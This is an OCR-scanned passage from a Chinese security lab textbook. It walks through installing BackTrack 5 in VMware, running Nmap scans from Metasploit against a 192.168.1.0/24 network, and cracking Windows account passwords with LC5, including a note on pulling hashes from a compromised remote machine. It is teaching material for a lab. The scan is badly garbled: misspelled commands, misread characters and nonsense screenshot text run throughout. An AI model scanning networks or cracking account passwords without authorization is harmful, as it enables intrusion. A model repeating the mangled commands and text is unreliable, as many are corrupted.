将 客户 机 操作 系统 连接 到 主机 上 的 专用 虚拟 网 络 * 


全 不 使 用 网 络 连接 (T) 

















(C Eee swa) ma ] 
图 929 网 络 连接 设置 


(OD 在 出 现 的 如 图 9. 2. 10 所 示 的 “选择 L/O 控制 器 类 型 ?界面 的 “SCSI 控制 器 ”选项 
中 ,选择 软件 推荐 的 LST Logic(L) 选 项 , 单 击 * 下 一 步 按 钮 。 


meen O 





选择 1/0 控制 器 类 型 
您 要 使 用 何 种 类 型 的 SCSI 控制 器 ? 





YO 控制 器 类 型 

SCSI 控制 器 : 
OBuslogic(y) (PERF 64 位 客户 机 ) 
@isttogic(L) GEF) 
© LSI Logic SAS(S) 
































图 9210 IO 控制 类 型 设置 
(12) 在 出 现 的 如 图 9. 2. 11 所 示 的 “选择 磁盘 类 型 "界面 的 “虚拟 磁盘 类 型 "选项 中 , 同 
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样 选 择 软件 推荐 的 SCSICS) 选 项 , 单 击 “下 一 步 "按钮 。 


























图 9211 虚拟 磁盘 类 型 设置 


(13) 在 出 现 的 如 图 9. 2. 12 所 示 的 “选择 磁盘 ”界面 的 “磁盘 ”选项 中 ,选择 “创建 新 虚拟 
磁盘 (V)" 模 式 , 单 击 * 下 一 步 "按钮 。 
masonas 0 


选择 磁盘 
您 要 使 用 哪个 谱 盘 ? 








' 创建 新 虚拟 谤 盘 (V) 
虚拟 磁盘 由 主机 文件 系统 上 的 一 个 或 多 个 文件 组 成 ， 客 户 机 操作 系统 会 将 其 视 为 单 
个 硬盘 。 虚拟 磁盘 可 在 一 台 主机 上 或 多 台 主机 之 间 径 松 夏 制 或 移动 。 


O 使 用 现 有 虚拟 磁盘 (E) 
选择 此 选项 将 重新 使 用 之 前 配置 的 磁盘 
O 使 用 物理 磁盘 (适用 于 高 级 用 户 )P) 
选择 此 选项 将 为 虚拟 机 提供 直接 访问 本 地 硬盘 的 权限 。 























图 9212 磁盘 创建 


(14) 在 出 现 的 如 图 9. 2. 13 所 示 的 “指定 磁盘 容量 "界面 的 “最 大 磁盘 大 小 (GB)(S)” 选 
项 中 ,同样 使 用 软件 建议 的 20. 0GB 大 小 ,当然 大 小 可 以 根据 自己 的 硬件 条 件 进 行 调整 。 不 
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建议 勾 选 “立即 分 配 所 有 磁盘 空间 ”, 因 为 根据 使 用 大 小 再 分 配 磁盘 空间 大 小 完全 够 用 ,并 不 
会 影响 使 用 效果 。 接 下 来 , 勾 选 “将 虚拟 磁盘 拆 分 成 多 个 文件 (M)” 选 项 , 单 击 “下 一 步 ” 
按钮 。 

LL 


dicun 
磁盘 大 小 为 多 少 ? 








最 大 磁盘 大 小 (GB)(S): 20.0 
针对 Ubuntu 64 位 的 建议 大 小 : 20 GB 











回 立 即 分 配 所 有 磁盘 空间 (A)。 


ibis St E el 即 可 用 。 如果 不 立即 分 本 
ij» 虚拟 磁盘 的 空间 最 初 很 小 ,会 随 着 您 向 其 中 添加 者 据 而 不 断交 大 。 


O 将 虚拟 磁盘 存储 为 单个 文件 (9) 
© 将 虚拟 磁盘 拆 分 成 务 个 文件 (M) 


= 可 以 更 轻松 地 在 计算 机 之 间 移动 虚拟 机 ， 但 可 能 会 降低 大 容量 碰 盘 的 

















图 9213 磁盘 大 小 设置 


(15) 在 出 现 的 如 图 9. 2. 14 所 示 的 “指定 磁盘 文件 ”界面 的 “磁盘 文件 ”中 ,同样 选择 软 
件 默 认 的 文件 名 称 和 磁盘 文件 存储 地 址 , 单 击 " 下 一 步 ”按钮 。 


LLL MER 






指定 磁盘 文件 
您 要 在 何 处 存 依 碰 盘 文件 7 





磁盘 文件 


将 为 每 2 68 容 里 的 虚拟 磁盘 创建 一 个 碰 盘 文件 。 除 第 一 个 文件 之 外 ， 每 个 文件 的 文件 
名 称 将 根据 此 处 所 提供 的 文件 名 称 自动 生成 。 





BT5.vmdk 














Cam] 
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(16) 此 时 软件 会 提示 用 户 已 准备 好 创建 虚拟 机 ,如 图 9. 2.15 所 示 。 此 时 , 单 击 “ 自 定 
义 硬件 ”选项 按钮 ,会 出 现 如 图 9. 2. 16 所 示 的 “硬件 ”界面 。 
LM 


已 准备 好 创建 虚拟 机 
单 击 FLA ORBEA © RELLE Ubuntu 64 位 。 











将 使 用 下 列 设置 创建 虚拟 机 : 
名 称 : BTS 
fus: D:\Program Files (x86)\vmware\BTS 
版 本 : Workstation 12.0 
操作 系统 : Ubuntu 64 fù 
硬盘 ; 20 GB, 拆 分 
At: 1024 MB 
网 络 适配器 : NAT 
其 他 设备 : CD/DVD, USB 控制 器 , 打印 机 , 声卡 


























图 9215 自 定义 硬件 设置 










































设备 gum 内 存 
Foe enter eol Me 
[ETT 1 x 
Qu Ar. een 此 二 机 的 内 存 (W): — 1024 [5] we 
Buss 控制 器 存在 vu 
QEF 自动 检测 vd 
Ls jd 16GB 
LII 自动 检 列 e WEGUAE 
4G (超出 此 大 小 可 能 
a. | * 发 生 内 存 交 换 。) 
18 - 白 4 3024 MB 
512 MB 4 Bene 
ae 1024 MB 
128 MB 
- C 建议 的 最 小 客户 机 操作 系统 内 存 
Sum 512 MB 
16M8 
8MB 
4MB 
d) HL HELPER 768 MB 用 作 图 形 内 存 。 您 可 以 
在 显示 器 "设置 页 面 中 更 改 此 数量 * 
BRR 
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(17) 选择 “硬件 ”界面 的 “设备 ”中 的 “新 CD/DVD(SATA) ?部 分 ,在 右 侧 的 “连接 ”选项 
中 选择 “使 用 TOS 映像 文件 (M)”, 通 过 “浏览 ”按钮 将 BT5 镜像 文件 地 址 选中 ,如 图 9. 2. 17 
所 示 , 单 击 “ 关 闭 ” 按 钮 。 



















设备 状态 
Detto 
T gati CO) 





ie 
© feRriniBSEEhS (b) 
CESI z) 
© 使 用 150 映像 文件 (M): 


D:\BaiduYunDownload\BT5- ~ (M(B) 






































图 9217 新 CDDVXSATA) 


(18) 此 时 回 到 刚才 的 完成 界面 ,如 图 9. 2. 18 所 示 ,再 单 击 * 完 成 ”按钮 ,完成 虚拟 机 的 
创建 。 


wees Ww 

















已 准备 好 创建 虚拟 机 
单 击 " 完 成 “ 建 虚 拟 机 。 然 后 可 以 安装 Ubuntu 64 位 。 

将 使 用 下 列 设置 创建 虚拟 机 : 

名 称 : BT5 

位 置 ; D:\Program Files (x86)\vmware\BT5 

版 本 : Workstation 12.0 

操作 系统 : Ubuntu 64 位 

ga: 20 GB, 拆 分 

A: 1024 MB 

网 络 适配器 : NAT 

其 他 设备 : CD/DVD, USB 控制 器 , 打印 机 , 声卡 























| 


图 9218 返回 它 准 备 好 创建 虚拟 机 ”界面 继续 安装 











(19) 可 以 看 到 在 软件 新 建 选项 卡 中 已 经 出 现 了 新 创建 的 名 为 BT5 的 虚拟 机 , 单 击 “ 开 
启 此 虚拟 机 ”选项 ,开启 虚拟 机 ,如 图 9. 2. 19 所 示 。 
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配置 文件 DAProgram Files (x86)\vmware\BTS\BT5.vmx 
硬件 兼容 性 : Workstation 12.0 ERM 
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(20) 稍 等 
则 进入 下 一 步 。 


9219 开启 虚拟 机 


片刻 出 现 如 图 9. 2. 20 所 示 的 界面 后 ,直接 按 “ 回 车 ” 键 , 即 选中 第 


| 
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BackTrack 
BackTr: 
BackTrack Text 
BackTrack Debu; 
BackTrack Ment 


Hard Drive Boot - boot the first 


<< back | track 5 


Press [Tab] to odit 


futomatic boot in 18 seconds 


DET 


options 





























(21) 在 命令 


(22) 可 以 看 到 此 时 


行 中 输入 


startx 





BackTrack 安装 软件 . Wd 
200 。 


A 
命令 


经 进入 了 
AK AE EIER 启动 此 安装 软件 。 


图 





9220 进入 系统 


桌面 系统 。 如 图 9. 


2. 92 


,启动 桌面 系统 ,如 图 9.2.21 所 示 。 


所 示 ,桌面 上 有 一 个 Install 





[+I Official BackTrack Hone Page: http://www. bocktreck-linux.org 


[x] Official BackTrack Training : http://w .offcnsive-scourity.con 


[+] To start a graphical interface, type " 
[+] The default root password is " " 


[ET 








[Bet sermo, TCR Sh np Cui. 





图 9221 启动 桌面 系统 


























B) ars - VMware Workstation [EET TT) 
ZÐ KE) EV ANNM RD we) | I~ | m | C £9 ||| E H OG || 
x x 
Q Eka X 
Applications Places System [=] Mon May 2, 1:28 AM 
EL UI 
5 
E) BTS >, 
some, [c: 
Install BackTrack 
SRSA TAUREN ,请 在 直拨 机 内 部 单 二 或 按 Ctrl+G。 EBL EIER 














9222 双击 Install BackTrack 





(23) 如 图 9.2.23 所 示 , 首 先 选择 安装 的 语言 。BT5 已 经 支持 中 文安 装 ,因此 从 左边 的 
语言 栏 中 选择 “中 文 (简体 )” 选 项 , 单 击 “ 前 进 ” 按 钮 。 











* Rm 


准备 好 安装 了 吗 ?一旦 您 完成 回答 几 个 问题 , 这 张 Live CD 上 的 内 容 
就 可 以 被 安装 到 这 台 计算 机 上 、 这 样 您 便 可 以 不 再 需要 这 张 CD , 并且 
ASSES BackTrack Live. 


回答 这 些 问题 仅 需要 几 分 钟 时 间 


中 文 (简体 ) 
a) 


第 1 步 ( 共 7 5) 





图 9223 初始 化 安装 设置 


(24) 选择 自己 所 在 的 地 区 与 时 区 。 不 过 软件 在 安装 中 会 自动 识别 用 户 机 器 所 在 的 地 
区 与 时 区 ,一 般 比 较 准 确 , 如 果 与 自己 所 在 的 地 区 或 时 区 有 误差 ,使 用 下 拉 菜 单 自行 矫正 即 
可 ,如 图 9. 2. 24 所 示 , 单 击 “ 前 进 ” 按 钮 。 





您 在 什么 地 方 ? 


请 选择 您 的 位 置 ， 以 便于 系统 使 用 符合 您 所 在 国家 习惯 的 明示 信息 ,从 离 您 较 近 的 站 点 接受 更 新 ， 
并 且 设 置 正 确 的 本 地 时 间 。 


地 区 : | 亚洲 


* 


第 2 步 ( 共 7 步 ) 退出 (9) 


后 退 (8) | | 前 进 (F) | 














图 9224 区 域 设置 





键盘 布局 
最 适合 您 的 键盘 布局 ? 
© 鞭 议 的 选项 :| USA 


O 猜测 键盘 布局 : [| 


O 选择 您 的 : 


您 可 以 在 框 内 测试 您 的 新 键盘 布局 。 
| 


第 3 步 ( 共 7 步 ) | 退出 (Q) || 后 退 (8) | | 前 进 (F) 

















9225 键盘 布局 设置 








(26) 准备 硬盘 空间 。 同 样 选择 系统 默认 的 选项 ,如 图 9. 2. 26 所 示 , 单 击 “ 前 进 ” 按 钮 。 


准备 硬盘 空间 


这 台 计算 机 没有 安装 操作 系统 , 


您 要 将 BackTrack Live 安装 在 哪里 ? 
清空 并 使 用 整个 硬盘 


| SCSI33 (0,0,0) (sda) - 21.5 GB VMware, VMware Virtual S 





O 手动 指定 分 区 (高 级 ) 





一 一 
lll BackTrack Live 


第 4 步 ( 共 7 步 ) 退出 (Q) | | 后 退 (8) | | 前 进 (F) 








图 9226 硬盘 空间 设置 





(27) 准备 开始 安装 软件 前 再 次 进行 确认 ,如 图 9. 2.27 所 示 。 此 时 直接 单 击 “ 安 装 ” 按 
钮 进行 安装 ,根据 硬件 设备 条 件 , 安 装 过 程 需 要 几 分 到 十 多 分 钟 不 等 的 时 间 。 

(28) 安装 结束 后 会 提示 用 户 是 否 重启 还 是 继续 对 Ubuntu 进行 测试 , 单 击 “ 现 在 重启 ” 
按钮 ,直接 重启 系统 ,如 图 9. 2. 28 所 示 。 

















准备 开始 安装 


您 的 新 操作 系统 将 会 使 用 下 列 选项 安装 : 





语言 ; 中 文 (简体 ) 
键盘 布局 : USA 
全 名 

登录 名 

位 置 : Asia/Harbin 
迁移 助手 


如 果 您 继续 ， 以 下 所 列 出 的 修改 内 容 将 被 写 和 磁盘。 否则 您 将 可 以 进行 进一步 的 手动 修改 。 





Bao) || mme) | | 





第 7 步 ( 共 7 步 ) 





图 9227 安装 开始 


安装 已 经 完成 。 您 可 以 继续 测试 Ubuntu ,但 是 重启 前 任何 


您 做 的 更 改 以 及 保存 的 文档 都 不 会 保留 。 


继续 测试 现在 重启 | 





图 9228 安装 完成 重启 


(29) 重启 系统 后 ,默认 进入 的 是 命令 行 模式 ,并 需要 用 户 先 登录 。 登 录 界面 如 图 9. 
所 示 ,在 创建 成 功 后 ,系统 默认 的 root 登录 名 称 为 root ,登录 密码 为 toor。 在 命令 ee 
用 户 名 并 按 “ 回 车 " 键 ,会 提示 用 户 输 入 密码 ,输入 密码 过 程 中 光标 没有 任何 移动 ,因此 要 确 
保密 码 输入 正确 ,输入 后 按 “ 回 车 ” 键 。 

(30) 登录 成 功 后 ,同样 使 用 startx 命令 ,直接 进入 桌面 系统 ,如 图 9.2. 30 所 示 。 

(31) 此 时 ,BT5 的 系统 已 经 全 部 安装 完毕 ,配置 完成 界面 如 图 9. 2. 31 1 所 示 。 
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图 9231 配置 完成 界面 


9.3 Nmap 网络 扫描 工具 


Metasploit 中 提供 了 一 些 辅 助 模块 用 于 发 现 活跃 的 主机 ,而 BTS 中 已 经 集成 了 
Metasploit 软件 。 使 用 Metasploit 软件 对 网 络 进行 扫描 的 步骤 如 下 。 
(1) 启动 Metasploit ,如 图 9.3.1 所 示 。 在 BTS 的 终端 中 输入 下 面 的 命令 : 


stall BackTrack 


File Edit 











E 931 启动 Metasplot 
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root@ bt:~ # msfoonsole 


(2) Nmap(Network mapper) 是 目前 最 流行 的 网 络 扫描 工具 , 它 不 仅 能 够 准确 地 探测 
单 台 主机 的 详细 情况 ,而且 能 够 高 效率 地 对 大 范围 的 IP 地 址 段 进行 扫描 。 使 用 Nmap fie 
得 知 目标 网 络 上 有 哪些 主机 是 存活 的 ,哪些 服务 是 开放 的 ,甚至 知道 网 络 中 使 用 了 何 种 类 型 
的 防火 墙 设 备 等 。 

Nmap 的 参数 和 选项 很 多 ,功能 也 很 丰富 。 通 常 Nmap 命令 的 格式 如 下 : 


msf> rmarx 扫 描 选项 >< 扫 描 目标 > 


其 中 ,扫描 选项 是 用 来 制定 扫描 的 方式 。 而 扫描 目标 则 一 般 是 用 点 分 十 进 制 表示 格式 的 IP 
来 表示 的 一 个 或 者 一 段 IP 地 址 。 如 果 仅 对 一 台 主 机 进行 扫描 ,那么 可 以 使 用 一 个 TP 地 址 
作为 扫描 范围 ;如 果 是 多 个 TP 地 址 ,可 以 使 用 逗号 分 隔 开 ; 如 果 是 一 段 连续 的 TP 地 址 ,可 以 
使 用 连 字符 号 CO 表示, 如 192. 168. 1. 1-192. 168. 1. 100, 或 使 用 无 类 型 域 间 选 路 地 址 块 
(CIDR) 表 示 , 如 192. 168. 1. 0/24. 

(3) 使 用 -sn 扫描 选项 。 

-sn 选项 会 使 用 ICMP 的 Ping 扫描 获取 网 络 中 的 存活 主机 情况 ,而 不 会 进一步 探测 主 
机 的 详细 情况 。 

输入 下 面 的 命令 行 : 


msf> nmap - sn 192.168.1.0/24 
得 到 的 Nmap 扫描 结果 如 下 : 


[* ] exec: nmap - sn 192.168.1.0/24 

Starting Nep 5.51SVN ( http://rmep.org ) at 2016- 05- 02 20:21 CST 
RTIVAR has grown to over 2.3 seconds, decreasing to 2.0 
Nmap scan report for 192.168.1.0 

Host is up (0.000315 latency). 

Nrep scan report for 192.168.1.1 

Host is up (0.016s latency). 

Nrep scan report for 192.168.1.2 

Host is up (0.014s latency). 

Nrep scan report for 192.168.1.4 

Host is up (0.016s latency). 

Nmap scan report for 192.168.1.5 

Host is up (0.0165 latency). 














Nrep scan report for 192.168.1.12 
Host is up (2.65 latency). 
Nmap scan report for 192.168.1.15 
Host is up (0.0013s latency). 
Nmap scan report for 192.168.1.24 
Host is up (0.000055 latency) . 
Nmap scan report for 192.168.1.25 
Host is up (0.0041s latency). 
+ 207 * 


Nmap scan report for 192.168.1.27 
Host is up (0.00024s latency). 
Nmap scan report for 192.168.1.3] 
Host is up (0.00145 latency). 
Nmap scan report for 192.168.1.33 
Host is up (0.00195 latency). 
Nrep scan report for 192.168.1.90 
Host is up (0.000195 latency). 
Nmap scan report for 192.168.1.92 
Host is up (0.00023 latency). 
Nmap scan report for 192.168.1.97 
Host is up (0.000099s latency). 
Nmap scan report for 192.168.1.100 
Host is up (0.043s latency). 
Nmap scan report for 192.168.1.101 
Host is up (0.000135 latency). 
Nmap scan report for 192.168.1.103 
Host is up (0.062s latency). 
Nrep scan report for 192.168.1.107 
Host is up (0.062s latency). 
Nmap scan report for 192.168.1.108 
Host is up (0.00021s latency). 
Nmep scan report for 192.168.1.109 
Host is up (0.000495 latency). 
Nmap scan report for 192.168.1.111 
Host is up (0.0022s latency). 
Nmap scan report for 192.168.1.117 
Host is up (0.000575 latency). 
Nmap scan report for 192.168.1.121 
Host is up (0.000755 latency). 
Nmap scan report for 192.168.1.125 
Host is up (0.00012s latency). 
Nmap scan report for 192.168.1.126 
Host is up (0.00045s latency). 
Nmap scan report for 192.168.1.136 
Host is up (0.000105 latency). 
Nmap scan report for 192.168.1.140 
Host is up (0.000265 latency). 
Nap scan report for 192.168.1.143 
Host is up (0.000205 latency). 
Nrap scan report for 192.168.1.156 
Host is up (0.0245 latency). 
Nrap scan report for 192.168.1.160 
Host is up (0.0465 latency). 
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Nmap scan report for 192.168.1.162 
Host is up (0.00060s latency). 
Nmap scan report for 192.168.1.172 
Host is up (0.000605 latency) . 
Nmap scan report for 192.168.1.175 
Host is up (2.6s latency). 

Nrep scan report for 192.168.1.177 
Host is up (0.00024s latency). 
Nrep scan report for 192.168.1.181 
Host is up (2.6s latency). 

Nrep scan report for 192.168.1.184 
Host is up (0.00020s latency) . 
Nrep scan report for 192.168.1.189 
Host is up (2.6s latency). 

Nmap scan report for 192.168.1.190 
Host is up (0.00040s latency) . 
Nmap scan report for 192.168.1.195 
Host is up (2.65 latency). 

Nrap scan report for 192.168.1.198 
Host is up (0.00017s latency) . 
Nmap scan report for 192.168.1.199 
Host is up (2.6s latency). 

Nmap scan report for 192.168.1.202 
Host is up (2.65 latency). 

Nmap scan report for 192.168.1.209 
Host is up (0.00014s latency). 
Nmap scan report for 192.168.1.212 
Host is up (2.65 latency). 

Nmap scan report for 192.168.1.215 
Host is up (0.000099s latency). 
Nmap scan report for 192.168.1.226 
Host is up (0.000285 latency). 
Nmap scan report for 192.168.1.229 
Host is up (2.65 latency). 

Nmap scan report for 192.168.1.235 
Host is up (0.00695 latency). 

Nmap scan report for 192.168.1.240 
Host is up (0.00013s latency) . 
Nrap scan report for 192.168.1.245 
Host is up (2.6s latency). 

Nmap scan report for 192.168.1.249 
Host is up (0.000355 latency) . 
Nmap scan report for 192.168.1.250 
Host is up (0.0185 latency). 
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Nmap scan report for 192.168.1.253 

Host is up (2.6s latency). 

Nmap scan report for 192.168.1.255 

Host is up (0.0014s latency). 

Nap done: 256 IP addresses (55 hosts up) scanned in 27.66 seconds 


可 以 看 出 ,在 不 到 30 秒 的 时 间 内 ,nmap 工具 从 192. 168. 1. 0 到 192. 168. 1. 255 的 地 址 


区 间 内 扫描 到 了 55 个 活跃 的 主机 。 
(4) 使 用 -O 扫描 选项 。 


-O 


扫描 选项 会 让 Nmap 扫描 软件 对 被 扫描 目标 的 操作 系统 进行 识别 。 


输入 下 面 的 命令 行 : 
msf> map -O 192.168.1.0 


得 到 的 -O 扫描 结果 如 下 : 


[* 


] exec: nmap -O 192.168.1.0 


Starting Nrap 5.51SVN ( http://rmap.org ) at 2016- 05- 02 21:06 CST 
Nmap scan report for 192.168.1.0 
Host is up (0.000305 latency). 


AM 


1000 scanned ports on 192.168.1.0 are filtered 


Warning: OSScan results may be unreliable because we could not find at least 1 gpen and 1 closed port 

Device type: general purpose 

Running: Microsoft Windows 2008| 7 

OS details: Microsoft Windows Server 2008 SPl, Microsoft Windows 7 Enterprise 

CE detection perfomed. Please report any incorrect results at http: //mep.org/smit/. 

Nep done: 1 IP address (1 host up) scanned in 52.87 seconds 

可 以 看 出 ,IP 地 址 为 192. 168. 1. 0 的 机 器 的 操作 系统 细节 为 : Microsoft Windows 
Server 2008 SP1，Microsoft Windows 7 Enterprise。 

(5) 大 部 分 扫描 器 会 对 所 有 的 端口 分 为 open( 开 放 ) 或 closed( 关 闭 ) 两 种 类 型 ,而 
Nmap 对 端口 状态 的 分 析 粒 度 更 加 细致 , 共 分 为 6 个 状态 : open (F HO closed (R A) 
filtered( 已 过 滤 )、unfiltered( 示 过滤) .open|filtered( 开 放 或 已 过 滤 ) „closed |filtered( 关 闭 或 
已 过 滤 )。 下 面 对 这 几 种 端口 状态 进行 说 明 。 


open; 一 个 应 用 程序 正在 此 端口 上 进行 监听 ,以 接收 来 自 TCP、UDP 或 SCTP 协议 
的 数据 。 这 是 在 渗透 测试 中 最 关注 的 一 类 端口 ,开放 端口 往往 能 够 提供 一 条 能 够 进 
入 系统 的 攻击 路 径 。 

closed; 关闭 的 端口 指 的 是 主机 已 响应 ,但 没有 应 用 程序 监听 的 端口 。 这 些 信息 并 
非 毫 无 价值 ,扫描 出 关闭 端口 至 少 说 明 主 机 是 活跃 的 。 

filtered: 这 种 状态 下 Nmap 不 能 确认 端口 是 否 开放 ,但 根据 响应 数据 猜测 该 端口 可 
能 被 防火 墙 等 设备 过 滤 。 

unfiltered: 仅 在 使 用 ACK 扫描 时 ,Nmap 无 法 确定 端口 是 否 开放 的 情况 下 归 为 此 
类 。 可 以 使 用 其 他 类 型 的 扫描 (如 Window 扫描 ,SYN 扫描 、FIN 扫描 ) 进 一 步 确认 
端口 的 信息 。 
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Nmap 的 参数 可 以 分 为 扫描 类 型 参数 和 扫描 选项 参数 ,扫描 类 型 参数 指定 Nmap 扫描 
实现 机 制 ,扫描 选项 则 确定 了 Nmap 执行 扫描 时 的 一 些 具 体 动作 。 

常用 的 Nmap 扫描 类 型 参数 主要 有 : 

-sT; TCP connect 扫描 ,类 似 于 Metasploit 中 的 tcp 扫描 模块 。 

-sS; TCP SYN 扫描 ,类 似 于 Metasploit 中 的 syn 扫描 模块 。 

-sF/-sX/-sN: 这 些 扫描 通过 发 送 一 些 特殊 的 标志 位 以 避 开 设备 或 软件 的 监测 。 

-SP: 通过 发 送 ICMP echo 请 求 探测 主机 是 否 存 活 , 原 理 同 Ping. 

-sU: 探测 目标 主机 开放 了 哪些 UDP 端口 。 

-sA; TCP ACK 扫描 ,类 似 Metasploit 中 的 ack 扫描 模块 。 

常用 的 Nmap 扫描 选项 有 : 

-Pn: 在 扫描 之 前 ,不 发 送 ICMP echo 请 求 测试 目标 是 否 活跃 。 

-O: 启用 对 于 TCP/IP 协议 栈 的 指纹 特征 扫描 ,以 获取 远程 主机 的 操作 系统 类 型 等 
HE. 

-F: 快速 扫描 模式 ,只 扫描 在 nmap-services 中 列 出 的 端口 。 

-p 达 端口 范围 二 : 可 以 使 用 这 个 参数 指定 希望 扫描 的 端口 ,也 可 以 使 用 一 段 端口 范围 
Cl 1—10230. fr IP 协议 扫描 中 (使 用 -sO BBO ,该 参数 的 意义 是 指定 想 要 扫描 的 协议 号 
(0—255), 

使 用 -sV 选项 ,可 以 获取 目标 地 址 更 加 详细 的 服务 版 本 等 信息 。 

输入 下 面 的 命令 行 : 

m> nmap - sV - Pn 192.168.1.1 


得 到 的 -sV 扫描 结果 如 下 : 


[* ] exec: nmap - SV - Pn 192.168.1.1 

Starting Nrap 5.51SVN ( http://rmap.org ) at 2016- 05- 02 21:31 CST 
Nmap scan report for 192.168.1.1 

Host is up (1.05 latency). 

Not shown: 994 closed ports 


FORT STATE SERVICE VERSION 

Dp qn ssh QpenSSH 3.991 (protocol 1.99) 
53/top — open domain ISC BIND 9.2.4 

Htc œn moin 

li/tp — open ident authd 

5l4/tep filtered sell 

32769/tqp open poini 


Service detection performed. Please report any incorrect results at http://nmap.org/sunmit/ . 
Nrep done: 1 IP address (1 host up) scanned in 265.02 seconds 


可 以 看 出 ,扫描 结果 对 端口 的 具体 信息 也 进行 了 扫描 ,甚至 列 出 了 使 用 端口 的 程序 的 名 
称 及 版 本 信息 。 


实验 报告 要 求 


。 实验 目的 。 
.211 。 


。 附 上 实验 过 程 的 截图 和 结果 。 
。 阐述 遇 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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第 10 章 口令 破解 和 安全 加 密 电 邮 实 验 


10.1 口令 破解 实验 


实验 器 材 


LOphtCrack 5. 02(LC5) 密 码 破解 工具 和 John the Ripper 密码 破解 工具 ,1 套 。 
PC SLs. 


实验 任务 
了 解 账号 口令 的 安全 性 ,掌握 安全 口令 的 设置 原则 ,以 保护 账号 口令 的 安全 。 
实验 环境 


硬件 : 一 台 安 装 Windows 2000/XP/Linux(Red Hat) 系 统 的 计算 机 。 
软件 : LOphtCrack5. 02 密码 破解 工具 和 John the Ripper 密码 破解 工具 。 


实验 步 又 


1. 使 用 LOphtCrack 5 破解 口令 
事先 在 主机 内 建立 用 户 名 test, 口 令 分 别 设置 为 空 、123123、security、security123 进行 
测试 。 

启动 LC5, 弹 出 LCS 的 主 界面 ,如 图 10.1.1 所 示 。 
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图 1011 LC5 主 界面 
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打开 文件 菜单 ,选择 LCS 向 导 , 如 图 10. 1. 2 所 示 。 
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1012 开始 执行 LC5 向 导 破 解 功能 


接着 会 弹出 LC 向 导 界 面 ,如 图 10. 1. 3 所 示 。 
LC5 向 导 


LC5 向 导 LC 5 Wizard 
EO 
信任 各: 
J, 25 AnSHERCREUPEMDIHTE 
EI RTS nem REMERON 


第 三 步 您 将 选择 以 何 种 方式 来 报告 破解 结果 。 


第 四 步 LC5 将 根据 您 的 设 定 进行 密码 破解 ， 当 破解 
SIZ» 


密码 完成 后 程序 会 


RTF Mees. 
Iv 下 次 局 动 不 在 显示 此 向 导 [D] 








图 1013 LC5 向 导 


单 击 Next 按钮 ,弹出 如 图 10. 1. 4 所 示 的 对 话 框 。 
如 果 要 破解 本 地 计算 机 的 口令 ,并 且 具 有 管理 员 权 限 ,那么 选择 “从 本 地 机 器 导入 ”; 如 
果 已 经 侵入 远程 的 一 人 台 主 机 ,并 且 有 管理 员 权 限 ,那么 可 以 选择 “从 远程 电脑 导入 ”, 这 样 就 
可 以 破解 远程 主机 的 SAM( 这 种 方法 对 使 用 syskey 保护 的 计算 机 无 效 ) ;如 果 获 得 了 一 台 
* 214 。 








© 从 本 地 机 器 导入 [LU 
从 本 地 电脑 导入 ， 但 需要 管理 员 权 限 。 


从 远程 电脑 导入 [R] 
在 你 电脑 域 的 远程 电脑 导入 加 密 文 件 , BES 
Saws. 


C 从 NT 40RSIESESAI) 


从 Windows NT 4 0 上 操作 系统 的 紧急 修复 盘 
PEAS sam at sam. MEOS. 


C MSHA SA (5) 
咱 探 加 密 的 口令 需要 管理 员 的 权限 才能 执行 。 
LC5 程 序 能 咱 探 到 以 太 网 设备 上 使 用 的 网 络 登 
陆 、 文 件 或 打印 共享 等 口令 。 








图 1014 选择 导入 加 密 口令 的 方法 





主机 的 紧急 修复 盘 , 那 么 可 以 破解 紧急 修复 盘 中 的 SAM; LCS 还 提供 在 网 络 中 探测 加 密 口 
令 的 选项 ,可 以 在 一 台 计 算 机 向 另外 一 台 计 算 机 通过 网 络 进行 认证 时 的 挑战 /应 答 过 程 中 截 
获 加 密 口 令 散 列 ,这 也 要 求 和 远程 计算 机 已 经 建立 起 连接 。 本 实验 破解 本 地 计算 机 的 口令 ， 
所 以 选择 "从 本 地 机 器 导入 ”, 然 后 单 击 Next 按钮 ,弹出 如 图 10. 1. 5 所 示 的 对 话 框 。 


选择 破解 方法 


© 快速 口令 破解 (0) 
去 习 把 字典 中 的 每 个 单词 和 口令 进行 简单 对 昭 
Tum. 


A C 普通 口令 破解 (0 


使 用 字典 中 的 单词 进行 交通 的 破解 ， 并 把 字典 
中 的 单 辣 进行 修正 破解 。 


48C30EE1: 


C 复杂 口令 破解 [5] 


人 
的 单词 进行 修正 破解 ， Et 
ETAT 数字 、 符 号 进行 尽 可 能 的 组 


C BsESHUJ 目 定义 选项 








图 1015 选择 破解 方法 


由 于 设置 的 是 空 口令 ,所 以 选择 快速 口令 破解 即 可 以 破解 口令 ,再 单 击 Next 按钮 , 弹 
出 如 图 10. 1. 6 所 示 的 对 话 框 。 
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48C30EEI: 


在 大 部 今 时间 里 ， 您 想 要 知道 破解 到 | 的 口令 是 
什么 ， 但 是 在 特定 的 情况 下 ， EDEECSM 
的 口令 ,是 香 显示 可 由 你 决定 : 


L T 显示 加 密 口令 做 列 'IH) 


选中 此 项 ,将 显示 哲 作 系统 的 加 密 口令 ,这些 
值 可 能 对 一 些 用 尸 的 其 它 口令 有 关 。 


Iv. 显示 完成 破解 每 个 口令 的 剩余 时 间 [T] 
选中 此 项 ,将 中 显示 框 中 增加 一 个 项 目 ,显示 
PRS TOS ROMERO - 


v 显示 破解 方法 


显示 破解 此 加 密 文件 所 用 的 破解 方法 ， 有 效 地 
检测 当前 用 户 的 弱 口 令 非常 有 效 ， 


MV 当 破 解 充 成 时 显示 信息 [V) 





图 1016 选择 报告 风格 


选择 默认 的 选项 即 可 ,接着 单 击 Next 按钮 ,弹出 如 图 10. 1. 7 所 示 的 对 话 框 。 


LC5 现 在 开始 准备 破解 密码 ， 请 确认 以 下 的 信息 ， 
en aie — 如 果 发 现 有 误 ， 按 返回 修改 设置 直到 正确 为 止 。 


a» 











图 1017 开始 破解 





单 击 Finish 按钮 ,软件 就 开始 破解 账号 口令 了 ,破解 结果 如 图 10. 1.8 所 示 。 
可 以 看 到 ,用 户 test 的 口令 为 空 ,软件 很 快 就 破解 了 出 来 。 
把 test 用 户 的 口令 改 为 123123 ,再 次 测试 ,由 于 口令 不 是 太 复 杂 , 还 是 选择 快速 口令 破 
解 ,破解 结果 如 图 10.1. 9 所 示 。 
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1 of 1 [E:\hack\ Er SE fS \LOphtCrack\words-english. dic] 





图 1019 ASA 123123 的 破解 结果 
可 以 看 出 ,test 用 户 的 口令 123123 也 被 很 快 地 破解 出 来 。 
把 主机 口令 设置 得 复杂 一 些 , 不 选用 数字 ,选择 某 些 英 文 单词 ,比如 security. 再 次 测 
